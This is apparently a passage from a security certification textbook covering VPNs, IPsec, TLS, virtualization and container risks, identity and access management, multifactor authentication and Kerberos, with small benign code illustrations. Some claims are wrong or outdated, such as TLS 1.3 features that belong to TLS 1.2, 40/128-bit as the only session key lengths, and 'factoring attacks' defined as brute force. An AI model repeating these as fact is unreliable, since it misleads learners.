A virtual storage area network (VSAN) is a software-defined storage method that allows pooling of storage
capabilities and instant and automatic provisioning of virtual
machine storage. This is a method of software-defined storage
(SDS). It usually includes dynamic tiering, QoS, caching,
replication, and cloning. Data availability is ensured through
the software, not by implementing redundant hardware.
Administrators are able to define policies that allow the
software to determine the best placement of data. By including
intelligent data placement, software-based controllers, and
software RAID, a VSAN can provide better data protection and
availability than traditional hardware-only options.
Virtual Private Cloud (VPC)
In Chapter 6, “Threats and Vulnerabilities Associated with
Operating in the Cloud,” you learned about cloud deployment
models, one of which was the hybrid model. A type of hybrid
model is the virtual private cloud (VPC) model. In this
model, a public cloud provider isolates a specific portion of its
public cloud infrastructure to be provisioned for private use.
How does this differ from a standard private cloud? VPCs are
private clouds sourced over a third-party vendor infrastructure
rather than over an enterprise IT infrastructure. Figure 8-14
illustrates this architecture.
Figure 8-14 Virtual Private Cloud
Virtual Private Network (VPN)
A virtual private network (VPN) allows external devices to
access an internal network by creating a tunnel over the
Internet. Traffic that passes through the VPN tunnel is
encrypted and protected. An example of a network with a VPN
is shown in Figure 8-15. In a VPN deployment, only computers
that have the VPN client and are able to authenticate will be
able to connect to the internal resources through the VPN
concentrator.
VPN connections use an untrusted carrier network but provide
protection of the information through strong authentication
protocols and encryption mechanisms. While we typically use
the most untrusted network, the Internet, as the classic
example, and most VPNs do travel through the Internet, a VPN
can be used with interior networks as well whenever traffic
needs to be protected from prying eyes.
FIGURE 8-15 VPN
In VPN operations, entire protocols are wrapped around, or
encapsulated within, other protocols. They include
A LAN protocol (required)
A remote access or line protocol (required)
An authentication protocol (optional)
An encryption protocol (optional)
A device that terminates multiple VPN connections is called a
VPN concentrator. VPN concentrators incorporate the most
advanced encryption and authentication techniques available.
In some instances, VLANs in a VPN solution may not be
supported by the ISP if they are also using VLANs in their
internal network. Choosing a provider that provisions
Multiprotocol Label Switching (MPLS) connections can allow
customers to establish VLANs to other sites. MPLS provides
VPN services with address and routing separation between
VPNs.
VPN connections can be used to provide remote access to
teleworkers or traveling users (called remote-access VPNs) and
can also be used to securely connect two locations (called site-to-site VPNs). The implementation process is conceptually
different for these two VPN types. In a remote-access VPN, the
tunnel that is created has as its endpoints the user’s computer
and the VPN concentrator. In this case, only traffic traveling
from the user computer to the VPN concentrator uses this
tunnel. In the case of two office locations, the tunnel endpoints
are the two VPN routers, one in each office. With this
configuration, all traffic that goes between the offices uses the
tunnel, regardless of the source or destination. The endpoints
are defined during the creation of the VPN connection and thus
must be set correctly according to the type of remote-access link
being used.
Two protocols commonly used to create VPN connections are
IPsec and SSL/TLS. The next section discusses these two
protocols.
IPsec
Internet Protocol Security (IPsec) is a suite of protocols used in
various combinations to secure VPN connections. Although it
provides other services, it is an encryption protocol. Before we
look at IPsec, let’s look at several remote-access or line
protocols (tunneling protocols) used to create VPN connections,
including
Point-to-Point Tunneling Protocol (PPTP): PPTP is a
Microsoft protocol based on PPP. It uses built-in Microsoft Point-to-Point Encryption and can use a number of authentication
methods, including CHAP, MS-CHAP, and EAP-TLS. One
shortcoming of PPTP is that it only works on IP-based networks. If
a WAN connection that is not IP based is in use, L2TP must be
used.
Layer 2 Tunneling Protocol (L2TP): L2TP is a newer protocol
that operates at Layer 2 of the OSI model. Like PPTP, L2TP can use
various authentication mechanisms; however, L2TP does not
provide any encryption. It is typically used with IPsec, which is a
very strong encryption mechanism.
When using PPTP, the encryption is included, and the only
remaining choice to be made is the authentication protocol.
When using L2TP, both encryption and authentication
protocols, if desired, must be added. IPsec can provide
encryption, data integrity, and system-based authentication,
which makes it a flexible and capable option. By implementing
certain parts of the IPsec suite, you can either use these features
or not.
Internet Protocol Security (IPsec) includes the following
components:
Authentication Header (AH): AH provides data integrity, data
origin authentication, and protection from replay attacks.
Encapsulating Security Payload (ESP): ESP provides all that
AH does as well as data confidentiality.
Internet Security Association and Key Management
Protocol (ISAKMP): ISAKMP handles the creation of a security
association (SA) for the session and the exchange of keys.
Internet Key Exchange (IKEv2): Also sometimes referred to as
IPsec Key Exchange, IKE provides the authentication material used
to create the keys exchanged by ISAKMP during peer
authentication. This was proposed to be performed by a protocol
called Oakley that relied on the Diffie-Hellman algorithm, but
Oakley has been superseded by IKEv2.
IPsec is a framework, which means it does not specify many of
the components used with it. These components must be
identified in the configuration, and they must match in order for
the two ends to successfully create the required SA that must be
in place before any data is transferred. The following selections
must be made:
The encryption algorithm, which encrypts the data
The hashing algorithm, which ensures that the data has not been
altered and verifies its origin
The mode, which is either tunnel or transport
The protocol, which can be AH, ESP, or both
All these settings must match on both ends of the connection. It
is not possible for the systems to select these on the fly. They
must be preconfigured correctly in order to match.
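The following C++ sketch illustrates the matching requirement; the type and field names are hypothetical and not drawn from any actual IPsec implementation. The point is simply that a security association can form only when every preconfigured parameter agrees on both ends.

// transform_match.cpp: sketch of the "settings must match" rule for an
// IPsec SA (all names here are hypothetical illustrations).
#include <iostream>
#include <string>

enum class Mode { Tunnel, Transport };
enum class Protocol { AH, ESP, Both };

struct TransformSet {
    std::string encryption;  // e.g., "AES-256"
    std::string hashing;     // e.g., "SHA-256"
    Mode mode;
    Protocol protocol;
};

// The SA can be established only when every parameter matches exactly;
// the peers cannot negotiate these on the fly.
bool can_establish_sa(const TransformSet& local, const TransformSet& remote) {
    return local.encryption == remote.encryption &&
           local.hashing == remote.hashing &&
           local.mode == remote.mode &&
           local.protocol == remote.protocol;
}

int main() {
    TransformSet site_a{"AES-256", "SHA-256", Mode::Tunnel, Protocol::ESP};
    TransformSet site_b{"AES-256", "SHA-1", Mode::Tunnel, Protocol::ESP};
    std::cout << (can_establish_sa(site_a, site_b)
                      ? "SA established\n"
                      : "SA fails: transform sets do not match\n");
    return 0;
}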
When configured in tunnel mode, the tunnel exists only
between the two gateways, but all traffic that passes through the
tunnel is protected. This is normally done to protect all traffic
between two offices. The SA is between the gateways between
the offices. This is the type of connection that would be called a
site-to-site VPN.
The SA between the two endpoints is made up of the security
parameter index (SPI) and the AH/ESP combination. The SPI, a
value contained in each IPsec header, helps the devices
maintain the relationship between each SA (and there could be
several happening at once) and the security parameters (also
called the transform set) used for each SA.
Each session has a unique session value, which helps prevent
Reverse engineering
Content modification
Factoring attacks (in which the attacker tries all the combinations of
numbers that can be used with the algorithm to decrypt ciphertext)
With respect to authenticating the connection, the keys can be
preshared or derived from a public key infrastructure (PKI). A
PKI creates public/private key pairs that are associated with
individual users and computers that use a certificate. These key
pairs are used in the place of preshared keys in that case.
Certificates that are not derived from a PKI can also be used.
In transport mode, the SA is either between two end stations or
between an end station and a gateway or remote access server.
In this mode, the tunnel extends from computer to computer or
from computer to gateway. This is the type of connection that
would be used for a remote-access VPN. This is but one
application of IPsec.
When the communication is from gateway to gateway or host to
gateway, either transport or tunnel mode may be used. If the
communication is computer to computer, transport mode is
required. When using transport mode from gateway to host, the
gateway must operate as a host.
The most effective attack against an IPsec VPN is a man-in-the-
middle attack. In this attack, the attacker proceeds through the
security negotiation phase until the key negotiation, when the
victim reveals its identity. In a well-implemented system, the
attacker fails when the attacker cannot likewise prove his
identity.
SSL/TLS
Secure Sockets Layer (SSL)/Transport Layer Security
(TLS) is another option for creating VPNs. Although SSL
has largely been replaced by its successor, TLS, it is quite
common to hear it still referred to as an SSL connection. It
works at the application layer of the OSI model and is used
mainly to protect HTTP traffic or web servers. Its functionality
is embedded in most browsers, and its use typically requires no
action on the part of the user. It is widely used to secure
Internet transactions. It can be implemented in two ways:
SSL/TLS portal VPN: In this case, a user has a single SSL/TLS
connection for accessing multiple services on the web server. Once
authenticated, the user is provided a page that acts as a portal to
other services.
SSL/TLS tunnel VPN: A user may use an SSL/TLS tunnel to
access services on a server that is not a web server. This solution
uses custom programming to provide access to non-web services
through a web browser.
TLS and SSL are very similar but not the same. When
configuring SSL/TLS, a session key length must be designated;
the two options are 40-bit and 128-bit. Using CA-signed (rather
than self-signed) certificates to authenticate the server’s public
key helps prevent man-in-the-middle attacks.
SSL/TLS is often used to protect other protocols; FTPS, for
example, uses SSL/TLS to secure file transfers between hosts.
(Secure Copy Protocol, or SCP, secures file transfers with SSH
instead.) Table 8-2 lists some of the advantages
and disadvantages of SSL/TLS.
Table 8-2 Advantages and Disadvantages of SSL/TLS
Advantages:
Data is encrypted.
SSL/TLS is supported on all browsers.
Users can easily identify its use (via https://).
Disadvantages:
Encryption and decryption require heavy resource usage.
Critical troubleshooting components (URL path, SQL queries, passed parameters) are encrypted.
When placing the SSL/TLS gateway, you must consider a trade-off: the closer the gateway is to the edge of the network, the less
encryption that needs to be performed in the LAN (and the less
performance degradation), but the closer to the network edge it
is placed, the farther the traffic travels through the LAN in the
clear. The decision comes down to how much you trust your
internal network.
The latest version of TLS is version 1.3, which provides access to
advanced cipher suites that support elliptic curve
cryptography and AEAD block cipher modes. TLS has been
improved to support the following:
Hash negotiation: Can negotiate any hash algorithm to be used
as a built-in feature, and the default cipher pair MD5/SHA-1 has
been replaced with SHA-256.
Certificate hash or signature control: Can configure the
certificate requester to accept only specified hash or signature
algorithm pairs in the certification path.
Suite B–compliant cipher suites: Two cipher suites have been
added so that the use of TLS can be Suite B compliant:
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
Serverless
In a serverless architecture, the servers that run an application
are not owned or managed by the application’s developer. In this model, applications are
hosted by a third-party service, eliminating the need for server
software and hardware management by the developer.
Applications are broken up into individual functions that can be
invoked and scaled individually. Function as a Service (FaaS),
another name for serverless architecture, was discussed in
Chapter 6.
CHANGE MANAGEMENT
All networks evolve, grow, and change over time. Companies
and their processes also evolve and change, which is a good
thing. But infrastructure change must be managed in a
structured way so as to maintain a common sense of purpose
about the changes. By following recommended steps in a formal
change management process, change can be prevented from
becoming the tail that wags the dog. The following are
guidelines to include as a part of any change management
policy:
All changes should be formally requested.
Each request should be analyzed to ensure it supports all goals and
policies.
Prior to formal approval, all costs and effects of the methods of
implementation should be reviewed.
After they’re approved, the change steps should be developed.
During implementation, incremental testing should occur, relying
on a predetermined fallback strategy if necessary.
Complete documentation should be produced and submitted with a
formal report to management.
One of the key benefits of following this change management
method is the ability to make use of the documentation in future
planning. Lessons learned can be applied, and even the process
itself can be improved through analysis.
VIRTUALIZATION
Multiple physical servers are increasingly being consolidated
onto a single physical device and hosted as virtual servers. It is even
possible to have entire virtual networks residing on these hosts.
While it may seem that these devices are safely contained on the
physical devices, they are still vulnerable to attack. If a host is
compromised or a hypervisor that manages virtualization is
compromised, an attack on the virtual machines (VMs) could
ensue.
Security Advantages and Disadvantages of Virtualization
Virtualization of servers has become a key part of reducing the
physical footprint of data centers. The advantages include
Reduced overall use of power in the data center
Dynamic allocation of memory and CPU resources to the servers
High availability provided by the ability to quickly bring up a replica
server in the event of loss of the primary server
However, most of the same security issues that must be
mitigated in the physical environment must also be addressed
in the virtual network. In a virtual environment, instances of an
operating system are virtual machines. A host system can
contain many VMs. Software called a hypervisor manages the
distribution of resources (CPU, memory, and disk) to the VMs.
Figure 8-16 shows the relationship between the host machine,
its physical resources, the resident VMs, and the virtual
resources assigned to them.
Figure 8-16 Virtualization
Keep in mind that in any virtual environment, each virtual
server that is hosted on the physical server must be configured
with its own security mechanisms. These mechanisms include
antivirus and anti-malware software and all the latest patches
and security updates for all the software hosted on the virtual
machine. Also, remember that all the virtual servers share the
resources of the physical device.
When virtualization is hosted on a Linux machine, any sensitive
application that must be installed on the host should be
installed in a chroot environment. A chroot on Unix-based
operating systems is an operation that changes the root
directory for the current running process and its children. A
program that is run in such a modified environment cannot
name (and therefore normally cannot access) files outside the
designated directory tree.
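The following minimal C++ sketch shows how a process might confine itself with the POSIX chroot() call. The jail path is hypothetical, the directory tree must already exist, and the call requires root privileges.

// chroot_demo.cpp: confining a process with chroot(2) (illustrative only).
#include <unistd.h>   // chroot(), chdir()
#include <cstdio>
#include <cstdlib>

int main() {
    const char* jail = "/srv/jail";  // hypothetical directory tree

    if (chroot(jail) != 0) {         // make the jail the new root directory
        std::perror("chroot");
        return EXIT_FAILURE;
    }
    if (chdir("/") != 0) {           // move into the new root so relative
        std::perror("chdir");        // paths cannot escape the jail
        return EXIT_FAILURE;
    }
    // From here on, this process and its children cannot name files outside
    // /srv/jail; "/etc/passwd" now resolves to /srv/jail/etc/passwd.
    std::puts("now running inside the chroot jail");
    return EXIT_SUCCESS;
}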
Type 1 vs. Type 2 Hypervisors
The hypervisor that manages the distribution of the physical
server’s resources can be either Type 1 or Type 2:
Type 1 hypervisor: A Type 1 hypervisor runs directly on the host
hardware (“bare metal”); guest operating systems run on a level
above the hypervisor. Examples of Type 1 hypervisors are
Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.
Type 2 hypervisor: A Type 2 hypervisor runs within a
conventional operating system environment. With the hypervisor
layer as a distinct second software level, guest operating systems
run at the third level above the hardware. VMware Workstation and
Oracle VM VirtualBox exemplify Type 2 hypervisors.
Figure 8-17 shows a comparison of the two approaches.
Figure 8-17 Hypervisor Types
Virtualization Attacks and Vulnerabilities
Virtualization attacks and vulnerabilities fall into the following
categories:
VM escape: This type of attack occurs when a guest OS escapes
from its VM encapsulation to interact directly with the hypervisor.
This can allow access to all VMs and the host machine as well.
Figure 8-18 illustrates an example of this attack.
FIGURE 8-18 VM Escape
Unsecured VM migration: This type of attack occurs when a VM
is migrated to a new host and security policies and configuration are
not updated to reflect the change.
Host and guest vulnerabilities: Host and guest interactions can
magnify system vulnerabilities. The operating systems on both the
host and the guest systems can suffer the same issues as those on all
physical devices. For that reason, both guest and host operating
systems should always have the latest security patches and should
have antivirus and anti-malware software installed and up to date.
All other principles of hardening the operating system should also
be followed, including disabling unneeded services and disabling
unneeded accounts.
VM sprawl: More VMs create more failure points, and sprawl can
cause problems even if no malice is involved. Sprawl occurs when
the number of VMs grows over time to an unmanageable number.
As this occurs, the ability of the administrator to keep up with them
is slowly diminished.
Hypervisor attack: This type of attack involves taking control of
the hypervisor to gain access to the VMs and their data. While these
attacks are rare due to the difficulty of directly accessing
hypervisors, administrators should plan for them.
Data remnants: Sensitive data inadvertently replicated in VMs as
a result of cloud maintenance functions or remnant data left in
terminated VMs needs to be protected. Also, if data is moved,
residual data may be left behind, accessible to unauthorized users.
Any remaining data in the old location should be shredded, but
depending on the security practice, data remnants may remain.
This can be a concern with confidential data in private clouds and
any sensitive data in public clouds. Commercial products can deal
with data remnants. For example, Blancco is a product that
permanently removes data from PCs, servers, data center
equipment, and smart phones. Data erased by Blancco cannot be
recovered with any existing technology. Blancco also creates a
report to price each erasure for compliance purposes.
Virtual Networks
A virtual infrastructure usually contains virtual switches that
connect to the physical switches in the network. You should
ensure that traffic from the physical network to the virtual
network is tightly controlled. Remember that virtual machines
run operating systems that are vulnerable to the same attacks as
those on physical machines. Also, the same type of network
attacks and scanning can be done if there is access to the virtual
network.
Management Interface
Some vulnerabilities exist in the management interface to the
hypervisor. The danger here is that this interface typically
provides access to the entire virtual infrastructure. The
following are some of the attacks through this interface:
Privilege elevation: In some cases, the dangers of privilege
elevation or escalation in a virtualized environment may be equal to
or greater than those in a physical environment. When the
hypervisor is performing its duty of handling calls between the
guest operating system and the hardware, any flaws introduced to
those calls could allow an attacker to escalate privileges in the guest
operating system. For example, a flaw in the VMware ESX Server,
Workstation, Fusion, and View products could have led to privilege
escalation on the host. VMware reacted quickly to fix this flaw with
a security update. The key to preventing privilege escalation is to
make sure all virtualization products have the latest updates and
patches.
Live VM migration: One of the advantages of a virtualized
environment is the ability of the system to migrate a VM from one
host to another when needed, called a live migration. When VMs
travel across the network between secured perimeters, attackers can
exploit network vulnerabilities to gain unauthorized access to the
VMs. With access to the VM images, attackers can plant malicious
code in them to stage attacks on the data centers that the VMs
travel between. Often the protocols used for the migration are not
encrypted, making a man-in-the-middle attack on the VM possible
while it is in transit, as shown in Figure 8-19. The key to
preventing man-in-the-middle attacks is encryption of the images,
both where they are stored and while they are in transit.
Figure 8-19 Man-in-the-Middle Attack
Vulnerabilities Associated with a Single Physical Server
Hosting Multiple Companies’ Virtual Machines
In some virtualization deployments, a single physical server
hosts multiple organizations’ VMs. All the VMs hosted on a
single physical computer must share the resources of that
physical server. If the physical server crashes or is
compromised, all the organizations that have VMs on that
physical server are affected. User access to the VMs should be
properly configured, managed, and audited. Appropriate
security controls, including antivirus, anti-malware, ACLs, and
auditing, must be implemented on each of the VMs to ensure
that each one is properly protected. Other risks to consider
include physical server resource depletion, network resource
performance, and traffic filtering between virtual machines.
Driven mainly by cost, many companies outsource to cloud
providers computing jobs that require a large number of
processor cycles for a short duration. This situation allows a
company to avoid a large investment in computing resources
that will be used for only a short time. Assuming that the
provisioned resources are dedicated to a single company, the
main vulnerability associated with on-demand provisioning is
traces of proprietary data that can remain on the virtual
machine and may be exploited.
Let’s look at an example. Say that a security architect is seeking
to outsource company server resources to a commercial cloud
service provider. The provider under consideration has a
reputation for poorly controlling physical access to data centers
and has been the victim of social engineering attacks. The
service provider regularly assigns VMs from multiple clients to
the same physical resource. When conducting the final risk
assessment, the security architect should take into
consideration the likelihood that a malicious user will obtain
proprietary information by gaining local access to the
hypervisor platform.
Vulnerabilities Associated with a Single Platform Hosting
Multiple Companies’ Virtual Machines
In some virtualization deployments, a single platform hosts
multiple organizations’ VMs. If all the servers that host VMs use
the same platform, attackers will find it much easier to attack
the other host servers once the platform is discovered. For
example, if all physical servers use VMware to host VMs, any
identified vulnerabilities for that platform could be used on all
host computers. Other risks to consider include misconfigured
platforms, separation of duties, and application of security
policy to network interfaces. If an administrator wants to
virtualize the company’s web servers, application servers, and
database servers, the following should be done to secure the
virtual host machines: only access hosts through a secure
management interface and restrict physical and network access
to the host console.
Virtual Desktop Infrastructure (VDI)
Virtual desktop infrastructure (VDI) hosts desktop
operating systems within a virtual environment in a centralized
server. Users access the desktops and run them from the server.
There are three models for implementing VDI:
Centralized model: All desktop instances are stored in a single
server, which requires significant processing power on the server.
Hosted model: Desktops are maintained by a service provider.
This model eliminates capital expense, replacing it with
operational expense.
Remote virtual desktops model: An image is copied to the local
machine, which means a constant network connection is
unnecessary.
Figure 8-20 compares the remote virtual desktop model (also
called streaming) with centralized VDI.
Figure 8-20 VDI Streaming and Centralized VDI
Terminal Services/Application Delivery Services
Just as operating systems can be provided on demand with
technologies like VDI, applications can also be provided to users
from a central location. Two models can be used to implement
this:
Server-based application virtualization (terminal
services): In server-based application virtualization, an
application runs on servers. Users receive the application
environment display through a remote client protocol, such as
Microsoft Remote Desktop Protocol (RDP) or Citrix Independent
Computing Architecture (ICA). Examples of terminal services
include Remote Desktop Services and Citrix Presentation Server.
Client-based application virtualization (application
streaming): In client-based application virtualization, the target
application is packaged and streamed to the client PC. It has its own
application computing environment that is isolated from the client
OS and other applications. A representative example is Microsoft
Application Virtualization (App-V).
Figure 8-21 compares these two approaches.
Figure 8-21 Application Streaming and Terminal Services
When using either of these technologies, you should force the
use of encryption, set limits to the connection life, and strictly
control access to the server. These measures can prevent
eavesdropping on any sensitive information, especially the
authentication process.
CONTAINERIZATION
A newer approach to server virtualization is referred to as
container-based virtualization, also called operating system
virtualization. Containerization is a technique in which the
kernel allows for multiple isolated user space instances. The
instances are known as containers, virtual private servers, or
virtual environments.
In this model, the hypervisor is replaced with operating
system–level virtualization. Each container is not a complete
operating system instance but rather a partial instance of the
same operating system that shares the host's kernel. The
containers in Figure 8-22 are the
darker boxes just above the host OS level. Container-based
virtualization is used mostly in Linux environments, and
examples are the commercial Parallels Virtuozzo and the open
source OpenVZ project.
Figure 8-22 Container-based Virtualization
IDENTITY AND ACCESS MANAGEMENT
This section describes how identity and access management
(IAM) work, why IAM is important, and how IAM components
and devices work together in an enterprise. Access control
allows only authorized users, applications, devices, and systems
to access enterprise resources and information. It includes
facilities, support systems, information systems, network
devices, and personnel. Security practitioners must use access
controls to specify which users can access a resource, which
resources can be accessed, which operations can be performed,
and which actions will be monitored. Once again, the CIA triad
is important in providing enterprise IAM. The three-step
process used to set up a robust IAM system is covered in the
following sections.
Identify Resources
This first step in the access control process involves defining all
resources in the IT infrastructure by deciding which entities
need to be protected. When defining these resources, you must
also consider how the resources will be accessed. The following
questions can be used as a starting point during resource
identification:
Will this information be accessed by members of the general public?
Should access to this information be restricted to employees only?
Should access to this information be restricted to a smaller subset of
employees?
Keep in mind that data, applications, services, servers, and
network devices are all considered resources. Resources are any
organizational asset that users can access. In access control,
resources are often referred to as objects.
Identify Users
After identifying the resources, an organization should identify
the users who need access to the resources. A typical security
professional must manage multiple levels of users who require
access to organizational resources. During this step, only
identifying the users is important. The level of access these
users will be given will be analyzed further in the next step.
As part of this step, you must analyze and understand the users’
needs and then measure the validity of those needs against
organizational needs, policies, legal issues, data sensitivity, and
risk.
Remember that any access control strategy and the system
deployed to enforce it should avoid complexity. The more
complex an access control system is, the harder that system is to
manage. In addition, anticipating security issues that could
occur in more complex systems is much harder. As security
professionals, we must balance the organization’s security needs
and policies with the needs of the users. If a security mechanism
that we implement causes too much difficulty for the user, the
user might engage in practices that subvert the mechanisms
that we implement. For example, if you implement a password
policy that requires a very long, complex password, users might
find remembering their passwords to be difficult. Users might
then write their passwords on sticky notes that they then attach
to their monitor or keyboard.
Identify Relationships Between Resources and Users
The final step in the access control process is to define the
access control levels that need to be in place for each resource
and the relationships between the resources and users. For
example, if an organization has defined a web server as a
resource, general employees might need a less restrictive level
of access to the resource than the level given to the public and a
more restrictive level of access to the resource than the level
given to the web development staff. Access controls should be
designed to support the business functionality of the resources
that are being protected. Controlling the actions that can be
performed for a specific resource based on a user’s role is vital.
Privilege Management
When users are given the ability to do something that typically
only an administrator can do, they have been granted privileges
and their account becomes a privileged account. The
management of such accounts is called privilege management
and must be conducted carefully because any privileges granted
become tools that can be used against your organization if an
account is compromised by a malicious individual.
An example of the use of privilege management is in the use of
attribute certificates (ACs) to hold user privileges with the same
object that authenticates them. So when Sally uses her
certificates to authenticate, she receives privileges that are
attributes of the certificate. This architecture is called a privilege
management infrastructure.
Multifactor Authentication (MFA)
Identifying users and devices and determining the actions
permitted by a user or device forms the foundation of access
control models. While this paradigm has not changed since the
beginning of network computing, the methods used to perform
this important set of functions have changed greatly and
continue to evolve. While simple usernames and passwords
once served the function of access control, in today’s world,
more sophisticated and secure methods are developing quickly.
Not only are such simple systems no longer secure, but the design
of access credential systems today also emphasizes ease of use.
Multifactor authentication (MFA) is the use of more than
a single factor, such as a password, to authenticate someone.
This section covers multifactor authentication.
Authentication
To be able to access a resource, a user must prove her identity,
provide the necessary credentials, and have the appropriate
rights to perform the tasks she is completing. So there are two
parts:
Identification: In the first part of the process, a user professes an
identity to an access control system.
Authentication: The second part of the process involves
validating a user with a unique identifier by providing the
appropriate credentials.
When trying to differentiate between these two parts, security
professionals should know that identification identifies the user,
and authentication verifies that the identity provided by the
user is valid. Authentication is usually implemented through a
user password provided at login. The login process should
validate the login after all the input data is supplied. The most
popular forms of user identification include user IDs or user
accounts, account numbers, and personal identification
numbers (PINs).
Authentication Factors
Once the user identification method has been established, an
organization must decide which authentication method to use.
Authentication methods are divided into five broad categories:
Knowledge factor authentication: Something a person knows
Ownership factor authentication: Something a person has
Characteristic factor authentication: Something a person is
Location factor authentication: Somewhere a person is
Action factor authentication: Something a person does
Authentication usually ensures that a user provides at least one
factor from these categories, which is referred to as single-factor
authentication. An example of this would be providing a
username and password at login. Two-factor authentication
ensures that the user provides factors from two different
categories. An example of two-factor authentication would be
providing a username, password, and smart card at login.
Three-factor authentication ensures that a user provides factors
from three different categories. An
example of three-factor authentication would be providing a
username, password, smart card, and fingerprint at login. For
authentication to be considered strong authentication, a user
must provide factors from at least two different categories.
(Note that the username is the identification factor, not an
authentication factor.)
You should understand that providing multiple authentication
factors from the same category is still considered single-factor
authentication. For example, if a user provides a username,
password, and the user’s mother’s maiden name, single-factor
authentication is being used. In this example, the user is still
only providing factors that are something a person knows.
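To make the category rule concrete, the following minimal Python sketch
(all names are hypothetical) counts how many distinct factor categories
an authentication attempt covers. Two knowledge factors still count as
one category:

# Hypothetical sketch: counting distinct factor categories to decide
# whether an authentication attempt qualifies as multifactor.
FACTOR_CATEGORIES = {
    "password": "knowledge",
    "pin": "knowledge",
    "mothers_maiden_name": "knowledge",
    "smart_card": "ownership",
    "token_device": "ownership",
    "fingerprint": "characteristic",
    "gps_location": "location",
    "typing_rhythm": "action",
}

def factor_count(provided_factors):
    """Return the number of DISTINCT categories represented."""
    return len({FACTOR_CATEGORIES[f] for f in provided_factors})

# Password + mother's maiden name: both knowledge, still single-factor.
print(factor_count(["password", "mothers_maiden_name"]))  # 1
# Password + smart card: two categories, true two-factor authentication.
print(factor_count(["password", "smart_card"]))           # 2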
Knowledge Factors
As previously described in brief, knowledge factor
authentication is authentication that is provided based on
something a person knows. This type of authentication is
referred to as a Type I authentication factor. While the most
popular form of authentication used by this category is
password authentication, other knowledge factors can be used,
including date of birth, mother’s maiden name, key
combination, or PIN.
Ownership Factors
Ownership factor authentication is authentication that is
provided based on something that a person has. This type of
authentication is referred to as a Type II authentication factor.
Ownership factors can include the following:
Token devices: A token device is a handheld device that presents
the authentication server with the one-time password. If the
authentication method requires a token device, the user must be in
physical possession of the device to authenticate. So although the
token device provides a password to the authentication server, the
token device is considered a Type II authentication factor because
its use requires ownership of the device. A token device is usually
implemented only in very secure environments because of the cost
of deploying the token device. In addition, token-based solutions
can experience problems because of the battery life span of the
token device. (A sketch of how a token can derive one-time
passwords follows this list.)
Memory cards: A memory card is a swipe card that is issued to a
valid user. The card contains user authentication information.
When the card is swiped through a card reader, the information
stored on the card is compared to the information that the user
enters. If the information matches, the authentication server
approves the login. If it does not match, authentication is denied.
Because the card must be read by a card reader, each computer or
access device must have its own card reader. In addition, the cards
must be created and programmed. Both of these steps add
complexity and cost to the authentication process. However, using
memory cards is often worth the extra complexity and cost for the
added security it provides, which is a definite benefit of this system.
However, the data on the memory cards is not protected, and this is
a weakness that organizations should consider before implementing
this type of system. Memory-only cards are very easy to counterfeit.
Smart cards: A smart card accepts, stores, and sends data but can
hold more data than a memory card. Smart cards, often known as
integrated circuit cards (ICCs), contain memory like memory cards
but also contain embedded chips like bank or credit cards. Smart
cards use card readers. However, the data on a smart card is used
by the authentication server without user input. To protect against
lost or stolen smart cards, most implementations require the user to
input a secret PIN, meaning the user is actually providing both Type
I (PIN) and Type II (smart card) authentication factors.
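As an illustration of how a token device and an authentication server
can agree on a one-time password, here is a toy HOTP-style derivation
in Python using only the standard library. It follows the general
RFC 4226 construction but is a sketch, not production code:

# Toy HOTP (RFC 4226-style) sketch: the token and the server share a
# secret and a counter; both derive the same short one-time password.
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Same secret and counter on both sides produce the same value.
print(hotp(b"shared-secret", counter=1))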
Characteristic Factors
Characteristic factor authentication is authentication
that is provided based on something a person is. This type of
authentication is referred to as a Type III authentication factor.
Biometric technology is the technology that allows users to be
authenticated based on physiological or behavioral
characteristics. Physiological characteristics include any unique
physical attribute of the user, including iris, retina, and
fingerprints. Behavioral characteristics measure a person’s
actions in a situation, including voice patterns and data entry
characteristics.
Single Sign-On (SSO)
In an effort to make users more productive, several solutions
have been developed to allow users to use a single password for
all functions and to use these same credentials to access
resources in external organizations. These concepts are called
single sign-on (SSO) and identity verification based on
federations. The following section looks at these concepts and
their security issues.
In an SSO environment, a user enters his login credentials once
and can access all resources in the network. The Open Group
Security Forum has defined many objectives for an SSO system.
Some of the objectives for the user sign-on interface and user
account management include the following:
The interface should be independent of the type of authentication
information handled.
The creation, deletion, and modification of user accounts should be
supported.
Support should be provided for a user to establish a default user
profile.
Accounts should be independent of any platform or operating
system.
Note
To obtain more information about the Open Group’s Single Sign-On Standard,
visit http://www.opengroup.org/security/sso_scope.htm.
SSO provides many advantages and disadvantages when it is
implemented.
Advantages of an SSO system include the following:
Users are able to use stronger passwords.
User and password administration is simplified.
Resource access is much faster.
User login is more efficient.
Users need to remember the login credentials for only a single
system.
Disadvantages of an SSO system include the following:
After a user obtains system access through the initial SSO login, the
user is able to access all resources to which he is granted access.
Although this is also an advantage for the user (only one login
needed), it is also considered a disadvantage because only one sign-on by an adversary can compromise all the systems that participate
in the SSO network.
If a user’s credentials are compromised, attackers will have access
to all resources to which the user has access.
Although the discussion of SSO so far has been mainly about
how it is used for networks and domains, SSO can also be
implemented in web-based systems. Enterprise access
management (EAM) provides access control management for
web-based enterprise systems. Its functions include
accommodation of a variety of authentication methods and role-based access control. SSO can be implemented in Kerberos,
SESAME, and federated identity management environments.
Security domains can then be established to assign SSO rights
to resources.
Kerberos
Kerberos is an authentication protocol that uses a client/server
model developed by MIT’s Project Athena. It is the default
authentication model in the recent editions of Windows Server
and is also used in Apple, Oracle, and Linux operating systems.
Kerberos is an SSO system that uses symmetric key
cryptography. Kerberos provides confidentiality and integrity.
Kerberos assumes that messaging, cabling, and client
computers are not secure and are easily accessible. In a
Kerberos exchange involving a message with an authenticator,
the authenticator contains the client ID and a timestamp.
Because a Kerberos ticket is valid for a certain time, the
timestamp ensures the validity of the request.
In a Kerberos environment, the key distribution center (KDC) is
the repository for all user and service secret keys. The process of
authentication and subsequent access to resources is as follows:
1. The client sends a request to the authentication server (AS), which
might or might not be the KDC.
2. The AS forwards the client credentials to the KDC.
3. The KDC authenticates clients to other entities on a network and
facilitates communication using session keys. The KDC provides
security to clients or principals, which are users, network services,
and software. Each principal must have an account on the KDC.
4. The KDC issues a ticket-granting ticket (TGT) to the principal.
5. The principal sends the TGT to the ticket-granting service (TGS)
